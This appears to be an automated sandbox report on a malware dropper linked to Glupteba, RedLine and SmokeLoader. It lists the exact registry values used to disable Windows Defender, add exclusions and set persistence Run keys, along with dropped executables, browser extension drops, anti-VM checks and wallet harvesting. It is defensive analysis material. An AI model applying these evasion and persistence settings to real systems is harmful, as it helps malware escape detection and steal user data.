Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detected google phishing page

phishing google

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\442C.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\442C.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\442C.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\442C.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\442C.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS73.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Control Panel\International\Geo\Nation C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3E1D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3EE9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TM0pC3TM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4322.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\442C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4612.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Jf821dM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EAA0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED12.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EFF1.exe N/A
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSF2C7.tmp\Install.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\K.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS73.tmp\Install.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28C5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3028.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\fydFwya.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 51.159.66.125 N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\442C.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TM0pC3TM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\YD6bx5XP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\3E1D.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\ED12.exe'\"" C:\Users\Admin\AppData\Local\Temp\ED12.exe N/A

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS73.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\fydFwya.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\fydFwya.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\SysWOW64\rundll32.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\MyBurn\MyBurn.exe C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File opened for modification C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files (x86)\KrPQunXfXpAVC\oLySDfI.xml C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
File created C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-I5B8T.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-18LTF.tmp C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A
